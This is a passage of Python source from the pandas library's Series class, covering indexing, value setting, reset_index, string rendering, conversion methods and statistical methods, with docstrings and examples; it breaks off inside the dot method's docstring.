def _ixs(self, i: int, axis: int = 0):
"""
Return the i-th value or values in the Series by location.
Parameters
----------
i : int
Returns
-------
scalar (int) or Series (slice, sequence)
"""
# dispatch to the values if we need
values = self._values
if isinstance(values, np.ndarray):
return libindex.get_value_at(values, i)
else:
return values[i]
@property
def _is_mixed_type(self):
return False
def _slice(self, slobj, axis=0, kind=None):
slobj = self.index._convert_slice_indexer(slobj, kind=kind or "getitem")
return self._get_values(slobj)
def __getitem__(self, key):
key = com.apply_if_callable(key, self)
try:
result = self.index.get_value(self, key)
if not is_scalar(result):
if is_list_like(result) and not isinstance(result, Series):
# we need to box if loc of the key isn't scalar here
# otherwise have inline ndarray/lists
try:
if not is_scalar(self.index.get_loc(key)):
result = self._constructor(
result, index=[key] * len(result), dtype=self.dtype
).__finalize__(self)
except KeyError:
pass
return result
except InvalidIndexError:
pass
except (KeyError, ValueError):
if isinstance(key, tuple) and isinstance(self.index, MultiIndex):
# kludge
pass
elif key is Ellipsis:
return self
elif com.is_bool_indexer(key):
pass
else:
# we can try to coerce the indexer (or this will raise)
new_key = self.index._convert_scalar_indexer(key, kind="getitem")
if type(new_key) != type(key):
return self.__getitem__(new_key)
raise
except Exception:
raise
if is_iterator(key):
key = list(key)
if com.is_bool_indexer(key):
key = check_bool_indexer(self.index, key)
return self._get_with(key)
def _get_with(self, key):
# other: fancy integer or otherwise
if isinstance(key, slice):
indexer = self.index._convert_slice_indexer(key, kind="getitem")
return self._get_values(indexer)
elif isinstance(key, ABCDataFrame):
raise TypeError(
"Indexing a Series with DataFrame is not "
"supported, use the appropriate DataFrame column"
)
elif isinstance(key, tuple):
try:
return self._get_values_tuple(key)
except Exception:
if len(key) == 1:
key = key[0]
if isinstance(key, slice):
return self._get_values(key)
raise
# pragma: no cover
if not isinstance(key, (list, np.ndarray, Series, Index)):
key = list(key)
if isinstance(key, Index):
key_type = key.inferred_type
else:
key_type = lib.infer_dtype(key, skipna=False)
if key_type == "integer":
if self.index.is_integer() or self.index.is_floating():
return self.loc[key]
else:
return self._get_values(key)
elif key_type == "boolean":
return self._get_values(key)
try:
# handle the dup indexing case (GH 4246)
if isinstance(key, (list, tuple)):
return self.loc[key]
return self.reindex(key)
except Exception:
# [slice(0, 5, None)] will break if you convert to ndarray,
# e.g. as requested by np.median
# hack
if isinstance(key[0], slice):
return self._get_values(key)
raise
def _get_values_tuple(self, key):
# mpl hackaround
if com._any_none(*key):
return self._get_values(key)
if not isinstance(self.index, MultiIndex):
raise ValueError("Can only tuple-index with a MultiIndex")
# If key is contained, would have returned by now
indexer, new_index = self.index.get_loc_level(key)
return self._constructor(self._values[indexer], index=new_index).__finalize__(
self
)
def _get_values(self, indexer):
try:
return self._constructor(
self._data.get_slice(indexer), fastpath=True
).__finalize__(self)
except Exception:
return self._values[indexer]
def __setitem__(self, key, value):
key = com.apply_if_callable(key, self)
def setitem(key, value):
try:
self._set_with_engine(key, value)
return
except com.SettingWithCopyError:
raise
except (KeyError, ValueError):
values = self._values
if is_integer(key) and not self.index.inferred_type == "integer":
values[key] = value
return
elif key is Ellipsis:
self[:] = value
return
elif com.is_bool_indexer(key):
pass
elif is_timedelta64_dtype(self.dtype):
# reassign a null value to iNaT
if is_valid_nat_for_dtype(value, self.dtype):
# exclude np.datetime64("NaT")
value = iNaT
try:
self.index._engine.set_value(self._values, key, value)
return
except (TypeError, ValueError):
# ValueError appears in only some builds in CI
pass
self.loc[key] = value
return
except TypeError as e:
if isinstance(key, tuple) and not isinstance(self.index, MultiIndex):
raise ValueError("Can only tuple-index with a MultiIndex")
# python 3 type errors should be raised
if _is_unorderable_exception(e):
raise IndexError(key)
if com.is_bool_indexer(key):
key = check_bool_indexer(self.index, key)
try:
self._where(~key, value, inplace=True)
return
except InvalidIndexError:
pass
self._set_with(key, value)
# do the setitem
cacher_needs_updating = self._check_is_chained_assignment_possible()
setitem(key, value)
if cacher_needs_updating:
self._maybe_update_cacher()
def _set_with_engine(self, key, value):
values = self._values
if is_extension_array_dtype(values.dtype):
# The cython indexing engine does not support ExtensionArrays.
values[self.index.get_loc(key)] = value
return
try:
self.index._engine.set_value(values, key, value)
return
except KeyError:
values[self.index.get_loc(key)] = value
return
def _set_with(self, key, value):
# other: fancy integer or otherwise
if isinstance(key, slice):
indexer = self.index._convert_slice_indexer(key, kind="getitem")
return self._set_values(indexer, value)
else:
if isinstance(key, tuple):
try:
self._set_values(key, value)
except Exception:
pass
if is_scalar(key) and not is_integer(key) and key not in self.index:
# GH#12862 adding an new key to the Series
# Note: have to exclude integers because that is ambiguously
# position-based
self.loc[key] = value
return
if is_scalar(key):
key = [key]
elif not isinstance(key, (list, Series, np.ndarray)):
try:
key = list(key)
except Exception:
key = [key]
if isinstance(key, Index):
key_type = key.inferred_type
else:
key_type = lib.infer_dtype(key, skipna=False)
if key_type == "integer":
if self.index.inferred_type == "integer":
self._set_labels(key, value)
else:
return self._set_values(key, value)
elif key_type == "boolean":
self._set_values(key.astype(np.bool_), value)
else:
self._set_labels(key, value)
def _set_labels(self, key, value):
if isinstance(key, Index):
key = key.values
else:
key = com.asarray_tuplesafe(key)
indexer = self.index.get_indexer(key)
mask = indexer == -1
if mask.any():
raise ValueError("%s not contained in the index" % str(key[mask]))
self._set_values(indexer, value)
def _set_values(self, key, value):
if isinstance(key, Series):
key = key._values
self._data = self._data.setitem(indexer=key, value=value)
self._maybe_update_cacher()
def repeat(self, repeats, axis=None):
"""
Repeat elements of a Series.
Returns a new Series where each element of the current Series
is repeated consecutively a given number of times.
Parameters
----------
repeats : int or array of ints
The number of repetitions for each element. This should be a
non-negative integer. Repeating 0 times will return an empty
Series.
axis : None
Must be ``None``. Has no effect but is accepted for compatibility
with numpy.
Returns
-------
Series
Newly created Series with repeated elements.
See Also
--------
Index.repeat : Equivalent function for Index.
numpy.repeat : Similar method for :class:`numpy.ndarray`.
Examples
--------
>>> s = pd.Series(['a', 'b', 'c'])
>>> s
0 a
1 b
2 c
dtype: object
>>> s.repeat(2)
0 a
0 a
1 b
1 b
2 c
2 c
dtype: object
>>> s.repeat([1, 2, 3])
0 a
1 b
1 b
2 c
2 c
2 c
dtype: object
"""
nv.validate_repeat(tuple(), dict(axis=axis))
new_index = self.index.repeat(repeats)
new_values = self._values.repeat(repeats)
return self._constructor(new_values, index=new_index).__finalize__(self)
def get_value(self, label, takeable=False):
"""
Quickly retrieve single value at passed index label.
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
label : object
takeable : interpret the index as indexers, default False
Returns
-------
scalar value
"""
warnings.warn(
"get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead",
FutureWarning,
stacklevel=2,
)
return self._get_value(label, takeable=takeable)
def _get_value(self, label, takeable=False):
if takeable is True:
return com.maybe_box_datetimelike(self._values[label])
return self.index.get_value(self._values, label)
_get_value.__doc__ = get_value.__doc__
def set_value(self, label, value, takeable=False):
"""
Quickly set single value at passed label.
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
If label is not contained, a new object is created with the label
placed at the end of the result index.
Parameters
----------
label : object
Partial indexing with MultiIndex not allowed
value : object
Scalar value
takeable : interpret the index as indexers, default False
Returns
-------
Series
If label is contained, will be reference to calling Series,
otherwise a new object.
"""
warnings.warn(
"set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead",
FutureWarning,
stacklevel=2,
)
return self._set_value(label, value, takeable=takeable)
def _set_value(self, label, value, takeable=False):
try:
if takeable:
self._values[label] = value
else:
self.index._engine.set_value(self._values, label, value)
except (KeyError, TypeError):
# set using a non-recursive method
self.loc[label] = value
return self
_set_value.__doc__ = set_value.__doc__
def reset_index(self, level=None, drop=False, name=None, inplace=False):
"""
Generate a new DataFrame or Series with the index reset.
This is useful when the index needs to be treated as a column, or
when the index is meaningless and needs to be reset to the default
before another operation.
Parameters
----------
level : int, str, tuple, or list, default optional
For a Series with a MultiIndex, only remove the specified levels
from the index. Removes all levels by default.
drop : bool, default False
Just reset the index, without inserting it as a column in
the new DataFrame.
name : object, optional
The name to use for the column containing the original Series
values. Uses ``self.name`` by default. This argument is ignored
when `drop` is True.
inplace : bool, default False
Modify the Series in place (do not create a new object).
Returns
-------
Series or DataFrame
When `drop` is False (the default), a DataFrame is returned.
The newly created columns will come first in the DataFrame,
followed by the original Series values.
When `drop` is True, a `Series` is returned.
In either case, if ``inplace=True``, no value is returned.
See Also
--------
DataFrame.reset_index: Analogous function for DataFrame.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4], name='foo',
... index=pd.Index(['a', 'b', 'c', 'd'], name='idx'))
Generate a DataFrame with default index.
>>> s.reset_index()
idx foo
0 a 1
1 b 2
2 c 3
3 d 4
To specify the name of the new column use `name`.
>>> s.reset_index(name='values')
idx values
0 a 1
1 b 2
2 c 3
3 d 4
To generate a new Series with the default set `drop` to True.
>>> s.reset_index(drop=True)
0 1
1 2
2 3
3 4
Name: foo, dtype: int64
To update the Series in place, without generating a new one
set `inplace` to True. Note that it also requires ``drop=True``.
>>> s.reset_index(inplace=True, drop=True)
>>> s
0 1
1 2
2 3
3 4
Name: foo, dtype: int64
The `level` parameter is interesting for Series with a multi-level
index.
>>> arrays = [np.array(['bar', 'bar', 'baz', 'baz']),
... np.array(['one', 'two', 'one', 'two'])]
>>> s2 = pd.Series(
... range(4), name='foo',
... index=pd.MultiIndex.from_arrays(arrays,
... names=['a', 'b']))
To remove a specific level from the Index, use `level`.
>>> s2.reset_index(level='a')
a foo
b
one bar 0
two bar 1
one baz 2
two baz 3
If `level` is not set, all levels are removed from the Index.
>>> s2.reset_index()
a b foo
0 bar one 0
1 bar two 1
2 baz one 2
3 baz two 3
"""
inplace = validate_bool_kwarg(inplace, "inplace")
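        # When dropping, replace the index with a fresh RangeIndex; if only some
        # levels of a MultiIndex are dropped, keep the remaining levels instead.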
if drop:
new_index = ibase.default_index(len(self))
if level is not None:
if not isinstance(level, (tuple, list)):
level = [level]
level = [self.index._get_level_number(lev) for lev in level]
if len(level) < self.index.nlevels:
new_index = self.index.droplevel(level)
if inplace:
self.index = new_index
# set name if it was passed, otherwise, keep the previous name
self.name = name or self.name
else:
return self._constructor(
self._values.copy(), index=new_index
).__finalize__(self)
elif inplace:
raise TypeError(
"Cannot reset_index inplace on a Series " "to create a DataFrame"
)
else:
df = self.to_frame(name)
return df.reset_index(level=level, drop=drop)
# ----------------------------------------------------------------------
# Rendering Methods
def __repr__(self):
"""
Return a string representation for a particular Series.
"""
buf = StringIO("")
width, height = get_terminal_size()
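        # a display.max_rows option of 0 falls back to the terminal height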
max_rows = (
height
if get_option("display.max_rows") == 0
else get_option("display.max_rows")
)
min_rows = (
height
if get_option("display.max_rows") == 0
else get_option("display.min_rows")
)
show_dimensions = get_option("display.show_dimensions")
self.to_string(
buf=buf,
name=self.name,
dtype=self.dtype,
min_rows=min_rows,
max_rows=max_rows,
length=show_dimensions,
)
result = buf.getvalue()
return result
def to_string(
self,
buf=None,
na_rep="NaN",
float_format=None,
header=True,
index=True,
length=False,
dtype=False,
name=False,
max_rows=None,
min_rows=None,
):
"""
Render a string representation of the Series.
Parameters
----------
buf : StringIO-like, optional
Buffer to write to.
na_rep : str, optional
String representation of NaN to use, default 'NaN'.
float_format : one-parameter function, optional
Formatter function to apply to columns' elements if they are
floats, default None.
header : bool, default True
Add the Series header (index name).
index : bool, optional
Add index (row) labels, default True.
length : bool, default False
Add the Series length.
dtype : bool, default False
Add the Series dtype.
name : bool, default False
Add the Series name if not None.
max_rows : int, optional
Maximum number of rows to show before truncating. If None, show
all.
min_rows : int, optional
The number of rows to display in a truncated repr (when number
of rows is above `max_rows`).
Returns
-------
str or None
String representation of Series if ``buf=None``, otherwise None.
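        Examples
        --------
        A minimal illustration of the default formatting (column spacing is
        chosen by the Series formatter):
        >>> print(pd.Series([1, 2, 3]).to_string())
        0    1
        1    2
        2    3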
"""
formatter = fmt.SeriesFormatter(
self,
name=name,
length=length,
header=header,
index=index,
dtype=dtype,
na_rep=na_rep,
float_format=float_format,
min_rows=min_rows,
max_rows=max_rows,
)
result = formatter.to_string()
# catch contract violations
if not isinstance(result, str):
raise AssertionError(
"result must be of type unicode, type"
" of result is {0!r}"
"".format(result.__class__.__name__)
)
if buf is None:
return result
else:
try:
buf.write(result)
except AttributeError:
with open(buf, "w") as f:
f.write(result)
# ----------------------------------------------------------------------
def items(self):
"""
Lazily iterate over (index, value) tuples.
        This method returns an iterable of tuples (index, value). This is
convenient if you want to create a lazy iterator.
Returns
-------
iterable
Iterable of tuples containing the (index, value) pairs from a
Series.
See Also
--------
DataFrame.items : Equivalent to Series.items for DataFrame.
Examples
--------
>>> s = pd.Series(['A', 'B', 'C'])
>>> for index, value in s.items():
... print("Index : {}, Value : {}".format(index, value))
Index : 0, Value : A
Index : 1, Value : B
Index : 2, Value : C
"""
return zip(iter(self.index), iter(self))
@Appender(items.__doc__)
def iteritems(self):
return self.items()
# ----------------------------------------------------------------------
# Misc public methods
def keys(self):
"""
Return alias for index.
Returns
-------
Index
Index of the Series.
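        Examples
        --------
        ``keys`` is simply an alias for ``Series.index``:
        >>> s = pd.Series([1, 2, 3], index=['a', 'b', 'c'])
        >>> s.keys()
        Index(['a', 'b', 'c'], dtype='object')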
"""
return self.index
def to_dict(self, into=dict):
"""
Convert Series to {label -> value} dict or dict-like object.
Parameters
----------
into : class, default dict
The collections.abc.Mapping subclass to use as the return
object. Can be the actual class or an empty
instance of the mapping type you want. If you want a
collections.defaultdict, you must pass it initialized.
.. versionadded:: 0.21.0
Returns
-------
collections.abc.Mapping
Key-value representation of Series.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s.to_dict()
{0: 1, 1: 2, 2: 3, 3: 4}
>>> from collections import OrderedDict, defaultdict
>>> s.to_dict(OrderedDict)
OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> dd = defaultdict(list)
>>> s.to_dict(dd)
defaultdict(<class 'list'>, {0: 1, 1: 2, 2: 3, 3: 4})
"""
# GH16122
into_c = com.standardize_mapping(into)
return into_c(self.items())
def to_frame(self, name=None):
"""
Convert Series to DataFrame.
Parameters
----------
name : object, default None
The passed name should substitute for the series name (if it has
one).
Returns
-------
DataFrame
DataFrame representation of Series.
Examples
--------
>>> s = pd.Series(["a", "b", "c"],
... name="vals")
>>> s.to_frame()
vals
0 a
1 b
2 c
"""
if name is None:
df = self._constructor_expanddim(self)
else:
df = self._constructor_expanddim({name: self})
return df
def to_sparse(self, kind="block", fill_value=None):
"""
Convert Series to SparseSeries.
.. deprecated:: 0.25.0
Parameters
----------
kind : {'block', 'integer'}, default 'block'
fill_value : float, defaults to NaN (missing)
Value to use for filling NaN values.
Returns
-------
SparseSeries
Sparse representation of the Series.
"""
warnings.warn(
"Series.to_sparse is deprecated and will be removed " "in a future version",
FutureWarning,
stacklevel=2,
)
from pandas.core.sparse.series import SparseSeries
values = SparseArray(self, kind=kind, fill_value=fill_value)
with warnings.catch_warnings():
warnings.filterwarnings("ignore", message="SparseSeries")
return SparseSeries(values, index=self.index, name=self.name).__finalize__(
self
)
def _set_name(self, name, inplace=False):
"""
Set the Series name.
Parameters
----------
name : str
inplace : bool
whether to modify `self` directly or return a copy
"""
inplace = validate_bool_kwarg(inplace, "inplace")
ser = self if inplace else self.copy()
ser.name = name
return ser
# ----------------------------------------------------------------------
# Statistics, overridden ndarray methods
# TODO: integrate bottleneck
def count(self, level=None):
"""
Return number of non-NA/null observations in the Series.
Parameters
----------
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a smaller Series.
Returns
-------
int or Series (if level specified)
Number of non-null values in the Series.
Examples
--------
>>> s = pd.Series([0.0, 1.0, np.nan])
>>> s.count()
2
"""
if level is None:
return notna(self.array).sum()
if isinstance(level, str):
level = self.index._get_level_number(level)
lev = self.index.levels[level]
level_codes = np.array(self.index.codes[level], subok=False, copy=True)
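        # a code of -1 marks a missing (NaN) label in this level; remap those to
        # an extra slot so np.bincount can tally them under the level's NA value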
mask = level_codes == -1
if mask.any():
level_codes[mask] = cnt = len(lev)
lev = lev.insert(cnt, lev._na_value)
obs = level_codes[notna(self.values)]
out = np.bincount(obs, minlength=len(lev) or None)
return self._constructor(out, index=lev, dtype="int64").__finalize__(self)
def mode(self, dropna=True):
"""
Return the mode(s) of the dataset.
Always returns Series even if only one value is returned.
Parameters
----------
dropna : bool, default True
Don't consider counts of NaN/NaT.
.. versionadded:: 0.24.0
Returns
-------
Series
Modes of the Series in sorted order.
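        Examples
        --------
        >>> pd.Series([2, 4, 2, 2, 4, None]).mode()
        0    2.0
        dtype: float64
        Ties are all returned, in sorted order:
        >>> pd.Series([2, 4, None]).mode()
        0    2.0
        1    4.0
        dtype: float64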
"""
# TODO: Add option for bins like value_counts()
return algorithms.mode(self, dropna=dropna)
def unique(self):
"""
Return unique values of Series object.
Uniques are returned in order of appearance. Hash table-based unique,
therefore does NOT sort.
Returns
-------
ndarray or ExtensionArray
The unique values returned as a NumPy array. See Notes.
See Also
--------
unique : Top-level unique method for any 1-d array-like object.
Index.unique : Return Index with unique values from an Index object.
Notes
-----
Returns the unique values as a NumPy array. In case of an
extension-array backed Series, a new
:class:`~api.extensions.ExtensionArray` of that type with just
the unique values is returned. This includes
* Categorical
* Period
* Datetime with Timezone
* Interval
* Sparse
* IntegerNA
See Examples section.
Examples
--------
>>> pd.Series([2, 1, 3, 3], name='A').unique()
array([2, 1, 3])
>>> pd.Series([pd.Timestamp('2016-01-01') for _ in range(3)]).unique()
array(['2016-01-01T00:00:00.000000000'], dtype='datetime64[ns]')
>>> pd.Series([pd.Timestamp('2016-01-01', tz='US/Eastern')
... for _ in range(3)]).unique()
<DatetimeArray>
['2016-01-01 00:00:00-05:00']
Length: 1, dtype: datetime64[ns, US/Eastern]
An unordered Categorical will return categories in the order of
appearance.
>>> pd.Series(pd.Categorical(list('baabc'))).unique()
[b, a, c]
Categories (3, object): [b, a, c]
An ordered Categorical preserves the category ordering.
>>> pd.Series(pd.Categorical(list('baabc'), categories=list('abc'),
... ordered=True)).unique()
[b, a, c]
Categories (3, object): [a < b < c]
"""
result = super().unique()
return result
def drop_duplicates(self, keep="first", inplace=False):
"""
Return Series with duplicate values removed.
Parameters
----------
keep : {'first', 'last', ``False``}, default 'first'
- 'first' : Drop duplicates except for the first occurrence.
- 'last' : Drop duplicates except for the last occurrence.
- ``False`` : Drop all duplicates.
inplace : bool, default ``False``
If ``True``, performs operation inplace and returns None.
Returns
-------
Series
Series with duplicates dropped.
See Also
--------
Index.drop_duplicates : Equivalent method on Index.
DataFrame.drop_duplicates : Equivalent method on DataFrame.
Series.duplicated : Related method on Series, indicating duplicate
Series values.
Examples
--------
Generate a Series with duplicated entries.
>>> s = pd.Series(['lama', 'cow', 'lama', 'beetle', 'lama', 'hippo'],
... name='animal')
>>> s
0 lama
1 cow
2 lama
3 beetle
4 lama
5 hippo
Name: animal, dtype: object
With the 'keep' parameter, the selection behaviour of duplicated values
can be changed. The value 'first' keeps the first occurrence for each
set of duplicated entries. The default value of keep is 'first'.
>>> s.drop_duplicates()
0 lama
1 cow
3 beetle
5 hippo
Name: animal, dtype: object
The value 'last' for parameter 'keep' keeps the last occurrence for
each set of duplicated entries.
>>> s.drop_duplicates(keep='last')
1 cow
3 beetle
4 lama
5 hippo
Name: animal, dtype: object
The value ``False`` for parameter 'keep' discards all sets of
duplicated entries. Setting the value of 'inplace' to ``True`` performs
the operation inplace and returns ``None``.
>>> s.drop_duplicates(keep=False, inplace=True)
>>> s
1 cow
3 beetle
5 hippo
Name: animal, dtype: object
"""
return super().drop_duplicates(keep=keep, inplace=inplace)
def duplicated(self, keep="first"):
"""
Indicate duplicate Series values.
Duplicated values are indicated as ``True`` values in the resulting
Series. Either all duplicates, all except the first or all except the
last occurrence of duplicates can be indicated.
Parameters
----------
keep : {'first', 'last', False}, default 'first'
- 'first' : Mark duplicates as ``True`` except for the first
occurrence.
- 'last' : Mark duplicates as ``True`` except for the last
occurrence.
- ``False`` : Mark all duplicates as ``True``.
Returns
-------
Series
Series indicating whether each value has occurred in the
preceding values.
See Also
--------
Index.duplicated : Equivalent method on pandas.Index.
DataFrame.duplicated : Equivalent method on pandas.DataFrame.
Series.drop_duplicates : Remove duplicate values from Series.
Examples
--------
By default, for each set of duplicated values, the first occurrence is
        set to False and all others to True:
>>> animals = pd.Series(['lama', 'cow', 'lama', 'beetle', 'lama'])
>>> animals.duplicated()
0 False
1 False
2 True
3 False
4 True
dtype: bool
which is equivalent to
>>> animals.duplicated(keep='first')
0 False
1 False
2 True
3 False
4 True
dtype: bool
By using 'last', the last occurrence of each set of duplicated values
        is set to False and all others to True:
>>> animals.duplicated(keep='last')
0 True
1 False
2 True
3 False
4 False
dtype: bool
        By setting keep to ``False``, all duplicates are marked True:
>>> animals.duplicated(keep=False)
0 True
1 False
2 True
3 False
4 True
dtype: bool
"""
return super().duplicated(keep=keep)
def idxmin(self, axis=0, skipna=True, *args, **kwargs):
"""
Return the row label of the minimum value.
If multiple values equal the minimum, the first row label with that
value is returned.
Parameters
----------
skipna : bool, default True
Exclude NA/null values. If the entire Series is NA, the result
will be NA.
axis : int, default 0
For compatibility with DataFrame.idxmin. Redundant for application
on Series.
*args, **kwargs
Additional keywords have no effect but might be accepted
for compatibility with NumPy.
Returns
-------
Index
Label of the minimum value.
Raises
------
ValueError
If the Series is empty.
See Also
--------
numpy.argmin : Return indices of the minimum values
along the given axis.
DataFrame.idxmin : Return index of first occurrence of minimum
over requested axis.
Series.idxmax : Return index *label* of the first occurrence
of maximum of values.
Notes
-----
This method is the Series version of ``ndarray.argmin``. This method
returns the label of the minimum, while ``ndarray.argmin`` returns
the position. To get the position, use ``series.values.argmin()``.
Examples
--------
>>> s = pd.Series(data=[1, None, 4, 1],
... index=['A', 'B', 'C', 'D'])
>>> s
A 1.0
B NaN
C 4.0
D 1.0
dtype: float64
>>> s.idxmin()
'A'
If `skipna` is False and there is an NA value in the data,
the function returns ``nan``.
>>> s.idxmin(skipna=False)
nan
"""
skipna = nv.validate_argmin_with_skipna(skipna, args, kwargs)
i = nanops.nanargmin(com.values_from_object(self), skipna=skipna)
if i == -1:
return np.nan
return self.index[i]
def idxmax(self, axis=0, skipna=True, *args, **kwargs):
"""
Return the row label of the maximum value.
If multiple values equal the maximum, the first row label with that
value is returned.
Parameters
----------
skipna : bool, default True
Exclude NA/null values. If the entire Series is NA, the result
will be NA.
axis : int, default 0
For compatibility with DataFrame.idxmax. Redundant for application
on Series.
*args, **kwargs
Additional keywords have no effect but might be accepted
for compatibility with NumPy.
Returns
-------
Index
Label of the maximum value.
Raises
------
ValueError
If the Series is empty.
See Also
--------
numpy.argmax : Return indices of the maximum values
along the given axis.
DataFrame.idxmax : Return index of first occurrence of maximum
over requested axis.
Series.idxmin : Return index *label* of the first occurrence
of minimum of values.
Notes
-----
This method is the Series version of ``ndarray.argmax``. This method
returns the label of the maximum, while ``ndarray.argmax`` returns
the position. To get the position, use ``series.values.argmax()``.
Examples
--------
>>> s = pd.Series(data=[1, None, 4, 3, 4],
... index=['A', 'B', 'C', 'D', 'E'])
>>> s
A 1.0
B NaN
C 4.0
D 3.0
E 4.0
dtype: float64
>>> s.idxmax()
'C'
If `skipna` is False and there is an NA value in the data,
the function returns ``nan``.
>>> s.idxmax(skipna=False)
nan
"""
skipna = nv.validate_argmax_with_skipna(skipna, args, kwargs)
i = nanops.nanargmax(com.values_from_object(self), skipna=skipna)
if i == -1:
return np.nan
return self.index[i]
# ndarray compat
argmin = deprecate(
"argmin",
idxmin,
"0.21.0",
msg=dedent(
"""
The current behaviour of 'Series.argmin' is deprecated, use 'idxmin'
instead.
The behavior of 'argmin' will be corrected to return the positional
minimum in the future. For now, use 'series.values.argmin' or
'np.argmin(np.array(values))' to get the position of the minimum
row."""
),
)
argmax = deprecate(
"argmax",
idxmax,
"0.21.0",
msg=dedent(
"""
The current behaviour of 'Series.argmax' is deprecated, use 'idxmax'
instead.
The behavior of 'argmax' will be corrected to return the positional
maximum in the future. For now, use 'series.values.argmax' or
'np.argmax(np.array(values))' to get the position of the maximum
row."""
),
)
def round(self, decimals=0, *args, **kwargs):
"""
Round each value in a Series to the given number of decimals.
Parameters
----------
decimals : int
Number of decimal places to round to (default: 0).
If decimals is negative, it specifies the number of
positions to the left of the decimal point.
Returns
-------
Series
Rounded values of the Series.
See Also
--------
numpy.around : Round values of an np.array.
DataFrame.round : Round values of a DataFrame.
Examples
--------
>>> s = pd.Series([0.1, 1.3, 2.7])
>>> s.round()
0 0.0
1 1.0
2 3.0
dtype: float64
"""
nv.validate_round(args, kwargs)
result = com.values_from_object(self).round(decimals)
result = self._constructor(result, index=self.index).__finalize__(self)
return result
def quantile(self, q=0.5, interpolation="linear"):
"""
Return value at the given quantile.
Parameters
----------
q : float or array-like, default 0.5 (50% quantile)
0 <= q <= 1, the quantile(s) to compute.
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
.. versionadded:: 0.18.0
This optional parameter specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`:
* linear: `i + (j - i) * fraction`, where `fraction` is the
fractional part of the index surrounded by `i` and `j`.
* lower: `i`.
* higher: `j`.
* nearest: `i` or `j` whichever is nearest.
* midpoint: (`i` + `j`) / 2.
Returns
-------
float or Series
If ``q`` is an array, a Series will be returned where the
index is ``q`` and the values are the quantiles, otherwise
a float will be returned.
See Also
--------
core.window.Rolling.quantile
numpy.percentile
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s.quantile(.5)
2.5
>>> s.quantile([.25, .5, .75])
0.25 1.75
0.50 2.50
0.75 3.25
dtype: float64
"""
self._check_percentile(q)
# We dispatch to DataFrame so that core.internals only has to worry
# about 2D cases.
df = self.to_frame()
result = df.quantile(q=q, interpolation=interpolation, numeric_only=False)
if result.ndim == 2:
result = result.iloc[:, 0]
if is_list_like(q):
result.name = self.name
return self._constructor(result, index=Float64Index(q), name=self.name)
else:
# scalar
return result.iloc[0]
def corr(self, other, method="pearson", min_periods=None):
"""
Compute correlation with `other` Series, excluding missing values.
Parameters
----------
other : Series
Series with which to compute the correlation.
method : {'pearson', 'kendall', 'spearman'} or callable
* pearson : standard correlation coefficient
* kendall : Kendall Tau correlation coefficient
* spearman : Spearman rank correlation
* callable: callable with input two 1d ndarrays
and returning a float. Note that the returned matrix from corr
will have 1 along the diagonals and will be symmetric
regardless of the callable's behavior
.. versionadded:: 0.24.0
min_periods : int, optional
Minimum number of observations needed to have a valid result.
Returns
-------
float
Correlation with other.
Examples
--------
>>> def histogram_intersection(a, b):
... v = np.minimum(a, b).sum().round(decimals=1)
... return v
>>> s1 = pd.Series([.2, .0, .6, .2])
>>> s2 = pd.Series([.3, .6, .0, .1])
>>> s1.corr(s2, method=histogram_intersection)
0.3
"""
this, other = self.align(other, join="inner", copy=False)
if len(this) == 0:
return np.nan
if method in ["pearson", "spearman", "kendall"] or callable(method):
return nanops.nancorr(
this.values, other.values, method=method, min_periods=min_periods
)
raise ValueError(
"method must be either 'pearson', "
"'spearman', 'kendall', or a callable, "
"'{method}' was supplied".format(method=method)
)
def cov(self, other, min_periods=None):
"""
Compute covariance with Series, excluding missing values.
Parameters
----------
other : Series
Series with which to compute the covariance.
min_periods : int, optional
Minimum number of observations needed to have a valid result.
Returns
-------
float
Covariance between Series and other normalized by N-1
(unbiased estimator).
Examples
--------
>>> s1 = pd.Series([0.90010907, 0.13484424, 0.62036035])
>>> s2 = pd.Series([0.12528585, 0.26962463, 0.51111198])
>>> s1.cov(s2)
-0.01685762652715874
"""
this, other = self.align(other, join="inner", copy=False)
if len(this) == 0:
return np.nan
return nanops.nancov(this.values, other.values, min_periods=min_periods)
def diff(self, periods=1):
"""
First discrete difference of element.
Calculates the difference of a Series element compared with another
element in the Series (default is element in previous row).
Parameters
----------
periods : int, default 1
Periods to shift for calculating difference, accepts negative
values.
Returns
-------
Series
First differences of the Series.
See Also
--------
Series.pct_change: Percent change over given number of periods.
Series.shift: Shift index by desired number of periods with an
optional time freq.
DataFrame.diff: First discrete difference of object.
Examples
--------
Difference with previous row
>>> s = pd.Series([1, 1, 2, 3, 5, 8])
>>> s.diff()
0 NaN
1 0.0
2 1.0
3 1.0
4 2.0
5 3.0
dtype: float64
Difference with 3rd previous row
>>> s.diff(periods=3)
0 NaN
1 NaN
2 NaN
3 2.0
4 4.0
5 6.0
dtype: float64
Difference with following row
>>> s.diff(periods=-1)
0 0.0
1 -1.0
2 -1.0
3 -2.0
4 -3.0
5 NaN
dtype: float64
"""
result = algorithms.diff(com.values_from_object(self), periods)
return self._constructor(result, index=self.index).__finalize__(self)
def autocorr(self, lag=1):
"""
Compute the lag-N autocorrelation.
This method computes the Pearson correlation between
the Series and its shifted self.
Parameters
----------
lag : int, default 1
Number of lags to apply before performing autocorrelation.
Returns
-------
float
The Pearson correlation between self and self.shift(lag).
See Also
--------
Series.corr : Compute the correlation between two Series.
Series.shift : Shift index by desired number of periods.
DataFrame.corr : Compute pairwise correlation of columns.
DataFrame.corrwith : Compute pairwise correlation between rows or
columns of two DataFrame objects.
Notes
-----
If the Pearson correlation is not well defined return 'NaN'.
Examples
--------
>>> s = pd.Series([0.25, 0.5, 0.2, -0.05])
>>> s.autocorr() # doctest: +ELLIPSIS
0.10355...
>>> s.autocorr(lag=2) # doctest: +ELLIPSIS
-0.99999...
If the Pearson correlation is not well defined, then 'NaN' is returned.
>>> s = pd.Series([1, 0, 0, 0])
>>> s.autocorr()
nan
"""
return self.corr(self.shift(lag))
def dot(self, other):
"""
Compute the dot product between the Series and the columns of other.
This method computes the dot product between the Series and another
        one, or the Series and each column of a DataFrame, or the Series and
